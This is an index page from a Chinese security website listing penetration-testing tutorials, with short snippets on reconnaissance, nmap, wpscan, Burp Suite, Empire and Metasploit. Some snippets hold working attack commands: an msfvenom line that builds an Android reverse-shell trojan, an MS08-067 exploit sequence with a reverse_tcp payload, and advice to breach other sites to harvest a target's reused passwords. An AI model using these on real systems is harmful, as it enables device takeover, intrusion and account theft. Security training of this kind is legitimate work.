安基网 首页 安全渗透测试
订阅

渗透测试

  • 给你一个网站做渗透测试你可以从哪方面入手

    给你一个网站做渗透测试你可以从哪方面入手
    1,信息收集:#,获取域名的whois信息,获取注册者邮箱姓名电话等。@ qqqq@vip.qq.com 如果目标站无漏洞,那么去其他站包含qqqq@vip.qq.com为用户名的站,拿下数据库,查密码@ 18511112222;包含18511112222为用户名的站,拿下数据库,查密码@ 注册时间:# 查询服务器旁站以及子域名站点,因为主站一般 ...
    2019-8-21 11:31
  • 黑客渗透攻击必备环境DVWA简介及搭建

    黑客渗透攻击必备环境DVWA简介及搭建
    DVWA(Damn Vulnerable Web App)是一个基于PHP/MySql搭建的Web应用程序,旨在为安全专业人员测试自己的专业技能和工具提供合法的 环境,帮助Web开发者更好的理解Web应用安全防范的过程。DVWA一共包含十个模块分别是:1.Bruce Force //暴力破解2.Command In ...
    2019-8-6 13:16
  • 测试人员渗透测试必备技能-Burpsuite

    测试人员渗透测试必备技能-Burpsuite
    Burpsuite 是用于攻击web 应用程序的集成平台。它包含了许多Burp工具,这些不同的Burp工具通过协同工作,有效的分享信息,支持以某种工具中的信息为基础供另一种工具使用的方式发起攻击。这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP 消息,持久性, ...
    2019-7-28 13:41
  • 信息收集:kalilinux下nmap的常用命令,黑客安全渗透必备知识

    信息收集:kalilinux下nmap的常用命令,黑客安全渗透必备知识
    nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统。它是网络管理员必用的软件之一,以及用以评估网络系统安全安装: sudo apt install nmap -ynmap主机发现扫码Ping扫描: 批量扫描一个网段的主机存活数. nmap -s ...
    2019-7-23 16:18
  • kali黑客系统wpscan工具扫描wordpress漏洞入侵攻击测试教程

    kali黑客系统wpscan工具扫描wordpress漏洞入侵攻击测试教程
    WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括主题漏洞、插件漏洞和WordPress本身的漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robo ...
    2019-7-23 16:17
  • 渗透神器Empire工具的简单利用

    渗透神器Empire工具的简单利用
    大家好,我是陌缘,今天给大家介绍一下后渗透神器,empire的使用方法~。首先我们先简单的介绍一下,什么是Empire(TA是干什么用的) 首先,empire,Empire 是一个纯粹的 PowerShell 后开发代理建立在密码安全的通信和灵活的架构。Empire实现了无需 powershell.exe 即可运行 PowerShell代理的功能,从键盘记录 ...
    2019-7-22 14:09
  • 测评:让自动化渗透测试更方便可靠的HaXM

    测评:让自动化渗透测试更方便可靠的HaXM
    HaXM 是自动化渗透测试项目的合理进化,不仅提供方便配置的持续扫描,还能给出帮助修复问题的建议。今天的企业网络复杂到令人叹为观止,一个小小的配置错误就能整个企业暴露在危险的漏洞和攻击之下。想要抢在黑客之前发现这些问题,网络安全团队通常会执行所谓的红队演练,也就是让训练有素的攻击者尝 ...
    2019-7-13 14:01
  • Kali Linux实战篇:使用Msfvenom生成木马实现远程控制安卓手机

    Kali Linux实战篇:使用Msfvenom生成木马实现远程控制安卓手机
    声明:本头条号【Kali技术】所有分享,仅限学习交流!请勿他用!先看Kali的ip,我的是192.168.0.101然后输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R /root/apk.apk这里的5555是设置的端口,也可以自己更改,显示这个说明已经生成成功 只有9K多 ...
    2019-7-1 12:39
  • Kali Linux渗透测试篇:Metasploit渗透测试框架使用篇

    Kali Linux渗透测试篇:Metasploit渗透测试框架使用篇
    Metasploit在渗透测试中经常被用到,实际上这套软件包括了很多工具,这些工具组成了一个完整的攻击框架。他们或许在渗透测试中的每一方面都不能称为最好用的工具,但组合起来的框架却让它变得强大。1.启动服务:在kali中使用metasploit, ...
    2019-6-29 13:41
  • Kali Linux渗透测试篇:Metasploit不同应用场景使用教程

    Kali Linux渗透测试篇:Metasploit不同应用场景使用教程
    1.远程代码执行 msfconsole search 08-067 use exploit/windows/smb/ms08_067_netapi show options set RHOST IP show payloads set payload windows/meterpreter/reverse_tcp show options set LHOST ip info(查看影响版本) 用nmap查看目标服务器版本 set target 编号 show options(检查是否已经设置 ...
    2019-6-25 12:16
  • 浅谈渗透测试实战

    浅谈渗透测试实战
    0x00 前言很多时候,在看白帽子们的漏洞的时候总有一种感觉就是把web渗透简单地理解成了发现web系统漏洞进而获取webshell。其实,个人感觉一个完整的渗透(从黑客的角度去思考问题)应该是以尽一切可能获取目标的系统或者服务器的最高权限,尽可能的发现足够多的敏感信息。这个过程应该包括但不限于以 ...
    2019-6-12 10:58
  • 渗透测试心得

    渗透测试心得
    子域名收集子域名收集是最简单的收集手法之一,有很多在线的工具可以直接套用,这里分享几个我经常用的。开心的时候用用这个扫描器为什么这么说,因为这是我写的(你生气用的话我怕我屏幕里突然冒出一个拖孩):impo ...
    2019-6-11 09:05
  • 详述MSSQL服务在渗透测试中的利用

    详述MSSQL服务在渗透测试中的利用
    前言:致力于复现最实用的漏洞利用过程。本文将带领大家学习以下内容:学习使用`xp_cmdshell`扩展存储过程学习调用`wscript.shell`学习MSSQL写文件学习沙盘模式提权学习注册表映像劫持提权part1 使用`xp_cmdshell`扩展存储过程步骤1 连接MSSQL服务首先打开S ...
    2019-6-7 09:34
  • Kali Linux学习篇:如何使用Kali Linux获取http协议账户密码?

    Kali Linux学习篇:如何使用Kali Linux获取http协议账户密码?
    HTTP介绍HTTP协议是Hyper Text Transfer Protocol(超文本传输协议)的缩写,是用于从万维网(WWW:World Wide Web )服务器传输超文本到本地浏览器的传送协议。HTTP是一个基于TCP/IP通信协议来传递数据(HTML 文件, 图片文件, 查询结果等)。HTTP是一个属于应用层的面向对象的协议,由于其简捷、快速的 ...
    2019-6-2 11:24
  • 作为内网杀手的metsploit如何在外网使用呢?

    作为内网杀手的metsploit如何在外网使用呢?
    经常使用metsploit的同学可能会有疑问,为啥我只能在同一局域网里面进行渗透主机呢? 这主要是因为你的身处于内网之中。不知道大家对内网和外网的理解是什么?这里我给大家普及一下吧!经常使用metsploit的同学可能会有疑问,为啥我只能在同一局域网里面进行渗透主机呢?……这主要是因为你的身处于内 ...
    2019-6-1 09:15
  • 最新
    热门
    返回顶部